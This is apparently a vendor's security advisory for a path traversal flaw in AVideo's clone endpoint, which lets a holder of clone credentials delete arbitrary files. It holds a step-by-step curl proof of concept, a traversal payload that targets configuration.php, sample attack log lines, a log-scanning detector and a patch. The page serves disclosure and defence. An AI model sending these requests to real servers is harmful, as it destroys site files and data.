CVE-2026-33293

CVE-2026-33293 is a high-severity path traversal vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. No fixed version is listed yet.

Summary

The deleteDump parameter in plugin/CloneSite/cloneServer.json.php is passed directly to unlink() without any path sanitization. An attacker with valid clone credentials can use path traversal sequences (e.g., ../../) to delete arbitrary files on the server, including critical application files such as configuration.php, causing complete denial of service or enabling further attacks by removing security-critical files.

Details

In plugin/CloneSite/cloneServer.json.php, the $clonesDir variable is set to the application's storage path appended with clones/ (line 11). When a deleteDump GET parameter is provided, its value is concatenated directly into a path passed to unlink() with no validation:

// plugin/CloneSite/cloneServer.json.php:10-11
$videosDir = Video::getStoragePath() . "";
$clonesDir = "{$videosDir}clones/";
// plugin/CloneSite/cloneServer.json.php:44-46
if (!empty($_GET['deleteDump'])) {
    $resp->error = !unlink("{$clonesDir}{$_GET['deleteDump']}");
    $resp->msg = "Delete Dump {$_GET['deleteDump']}";
    die(json_encode($resp));
}

The intended functionality is to delete SQL dump files generated during the clone process (named via uniqid() at line 58). However, because $_GET['deleteDump'] is never passed through basename(), realpath(), or any other path normalization function, an attacker can supply directory traversal sequences to escape the $clonesDir directory.

Given a typical $clonesDir of /var/www/html/videos/clones/, the payload ../../videos/configuration.php resolves to /var/www/html/videos/configuration.php.

The authentication guard thisURLCanCloneMe() at line 38 requires a valid URL and matching key for an admin-approved clone entry (status === 'a'). This is a service-level credential, not an admin session; every approved clone partner holds one as part of normal operations.

The legitimate clone client at cloneClient.json.php:275 only sends server-generated $json->sqlFile values (produced by uniqid()), but nothing prevents a holder of valid credentials from crafting a manual HTTP request with an arbitrary deleteDump value.

PoC

Prerequisites: A valid clone URL and key pair registered and approved by an admin.

Step 1: Verify the target file exists (e.g., the application configuration file).

curl -s "https://avideo.local/videos/configuration.php" -o /dev/null -w "%{http_code}"
# Expected: 200 (or 302/403): the file exists and is either executed or access-protected

Step 2: Send the path traversal payload via the deleteDump parameter.

curl -s "https://avideo.local/plugin/CloneSite/cloneServer.json.php?url=https://approved-clone.local&key=VALID_CLONE_KEY&deleteDump=../../videos/configuration.php"

Expected response:

{"error":false,"msg":"Delete Dump ..\/..\/videos\/configuration.php","url":"https:\/\/approved-clone.local","key":"VALID_CLONE_KEY","useRsync":0,"videosDir":"\/var\/www\/html\/videos\/","sqlFile":"","videoFiles":[],"photoFiles":[]}

"error":false means unlink() returned true: the file was deleted.

Step 3: Confirm deletion.

curl -s "https://avideo.local/videos/configuration.php" -o /dev/null -w "%{http_code}"
# Expected: 404 (the file is gone) or 500 (any code path that requires it now fatal-errors)

Step 4: At this point the entire AVideo application is broken: configuration.php contains the database credentials and is loaded via require_once by nearly every endpoint.

Impact

  • Arbitrary file deletion: An attacker can delete any file the web server process is permitted to unlink (i.e., any file in a directory the process can write to), including application source code, configuration files, uploaded media, and database dumps containing credentials.
  • Complete denial of service: Deleting configuration.php renders the entire AVideo installation non-functional. Every page load will fatal-error on the missing require_once.
  • Security control bypass: Deleting .htaccess files or other access-control configurations can expose otherwise-protected directories and files.
  • Data loss: Uploaded videos, user photos, and SQL backups stored under the videos directory can be permanently destroyed.
  • Potential escalation: Deleting specific files (e.g., plugin configurations, auth modules) may weaken the application's security posture and enable further attacks.

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. The generic impact of this weakness class is unauthorized file read or write outside the intended directory; here the sink is unlink(), so the concrete impact is deletion.

CVE-2026-33293 has a CVSS score of 8.1 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.
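The monitoring recommended above is straightforward for this bug because the vulnerable sink reads $_GET: every attempt, including the PoC requests shown earlier, lands in the web server's access log request line. The following Python script is an added example and is not part of the advisory or of AVideo. It parses combined-format access log lines (the sample lines embedded in it are constructed, not real traffic), percent-decodes the query once as PHP does, and flags any deleteDump value that carries a path component, which a uniqid()-derived dump name never has. The .sql suffix on the benign sample is an assumption about how the dumps are named.

```python
#!/usr/bin/env python3
"""Detect CVE-2026-33293 exploitation attempts in web-server access logs.

cloneServer.json.php reads deleteDump from $_GET, so every attempt, successful or
not, appears in the request line of the access log. A legitimate value is a bare
dump filename; any value carrying a path component is a traversal attempt.
"""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Path of the vulnerable endpoint relative to the AVideo document root.
ENDPOINT = "/plugin/CloneSite/cloneServer.json.php"

# Apache/nginx "combined" format up to the status code; trailing fields are ignored.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_traversal(delete_dump: str) -> bool:
    """Return True if the (already percent-decoded) deleteDump value leaves $clonesDir.

    The vulnerable code builds "{$clonesDir}{$_GET['deleteDump']}" and calls unlink(),
    so only a bare filename is legitimate. Anything basename() would change, a bare
    '..' or '.', a NUL byte, or a backslash (never part of a uniqid()-derived name) is
    flagged. A backslash does not traverse on Linux; it is reported as probing.
    """
    if "\x00" in delete_dump or "\\" in delete_dump:
        return True
    if posixpath.basename(delete_dump) != delete_dump:
        return True  # contains '/', so it names a directory component
    return delete_dump in ("..", ".")


def parse_line(line: str):
    """Parse one access-log line into (client, time, query dict, status).

    Returns None for malformed lines and for requests to other endpoints.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # endswith() tolerates installs under a sub-directory such as /avideo/.
    if not parts.path.endswith(ENDPOINT):
        return None
    # parse_qs percent-decodes exactly once, matching what PHP's $_GET receives.
    query = parse_qs(parts.query, keep_blank_values=True)
    return m.group("client"), m.group("time"), query, int(m.group("status"))


def scan(lines):
    """Return one finding per request whose deleteDump value is a traversal attempt."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, when, query, status = parsed
        for value in query.get("deleteDump", []):
            if is_traversal(value):
                findings.append({
                    "client": client,
                    "time": when,
                    # The endpoint answers 200 whether or not unlink() succeeded,
                    # so the status code does not tell you whether a file was removed.
                    "status": status,
                    "deleteDump": value,
                    "clone_url": query.get("url", [""])[0],
                })
    return findings


# Constructed sample lines (not real traffic). The .sql name on the first line is an
# assumption about how the uniqid()-derived dump files are named.
SAMPLE_LOG = [
    '198.51.100.20 - - [10/Apr/2026:12:00:01 +0000] "GET /plugin/CloneSite/cloneServer.json.php'
    '?url=https%3A%2F%2Fapproved-clone.local&key=VALID_CLONE_KEY&deleteDump=65f1a2b3c4d5e.sql'
    ' HTTP/1.1" 200 312 "-" "AVideo-clone"',
    '203.0.113.7 - - [10/Apr/2026:12:03:44 +0000] "GET /plugin/CloneSite/cloneServer.json.php'
    '?url=https://approved-clone.local&key=VALID_CLONE_KEY&deleteDump=../../videos/configuration.php'
    ' HTTP/1.1" 200 298 "-" "curl/8.5.0"',
    '203.0.113.7 - - [10/Apr/2026:12:03:51 +0000] "GET /plugin/CloneSite/cloneServer.json.php'
    '?url=https://approved-clone.local&key=VALID_CLONE_KEY'
    '&deleteDump=%2e%2e%2f%2e%2e%2fvideos%2fconfiguration.php HTTP/1.1" 200 298 "-" "curl/8.5.0"',
    '192.0.2.9 - - [10/Apr/2026:12:05:00 +0000] "GET /plugin/CloneSite/cloneServer.json.php'
    '?url=https://approved-clone.local&key=VALID_CLONE_KEY HTTP/1.1" 200 1024 "-" "AVideo-clone"',
    '192.0.2.9 - - [10/Apr/2026:12:05:03 +0000] "GET /view/index.php?deleteDump=../x'
    ' HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} deleteDump={f['deleteDump']!r} (HTTP {f['status']})")
```

Because the endpoint answers HTTP 200 whether or not unlink() succeeded, a hit cannot be downgraded on the status code alone; treat it as a possible deletion and verify the referenced file on disk. It is also worth reviewing every deleteDump request whose source is not one of your approved clone hosts, since a legitimate partner only ever sends the server-generated dump name.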

Affected versions

wwbn/avideo (<= 25.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Apply basename() to the deleteDump parameter to strip any directory traversal components, ensuring the deletion is restricted to files within $clonesDir:

// plugin/CloneSite/cloneServer.json.php:44-48
if (!empty($_GET['deleteDump'])) {
    // basename() drops every directory component, so "../../x" becomes "x".
    $deleteDump = basename($_GET['deleteDump']);
    $filePath = "{$clonesDir}{$deleteDump}";
    // realpath() returns false for a missing file and resolves symlinks; the trailing
    // separator stops a sibling such as clones_old/ from passing the prefix test.
    $realBase = realpath($clonesDir);
    $realPath = realpath($filePath);
    if ($realBase === false || $realPath === false
        || strpos($realPath, $realBase . DIRECTORY_SEPARATOR) !== 0
        || !is_file($realPath)) {
        $resp->error = true;
        $resp->msg = "Invalid file path";
        die(json_encode($resp));
    }
    $resp->error = !unlink($realPath);
    $resp->msg = "Delete Dump {$deleteDump}";
    die(json_encode($resp));
}

The fix applies defense-in-depth: basename() strips every directory component from the input, and the realpath() check, compared against the canonical clones directory with a trailing separator, rejects anything that still resolves outside it, including a symlink planted inside clones/ that points at another file and a sibling directory whose name merely begins with clones. Restricting the target to a regular file with is_file() and reporting the rejection with error set to true keeps the client from mistaking a blocked request for a successful deletion.

Frequently Asked Questions

  1. What is CVE-2026-33293? CVE-2026-33293 is a high-severity path traversal vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. No fixed version is listed yet. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is CVE-2026-33293? CVE-2026-33293 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-33293? wwbn/avideo (composer) versions <= 25.0 are affected.
  4. Is there a fix for CVE-2026-33293? No fixed version is listed for CVE-2026-33293 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-33293 exploitable, and should I be worried? Whether CVE-2026-33293 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-33293 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33293? No fixed version is listed yet. In the interim: Resolve the canonical path after applying any user-supplied input, and verify it remains within the intended directory before accessing it.

Other vulnerabilities in wwbn/avideo

  • CVE-2026-33731
  • CVE-2026-33692
  • CVE-2026-33684
  • CVE-2026-54458
  • CVE-2026-50183
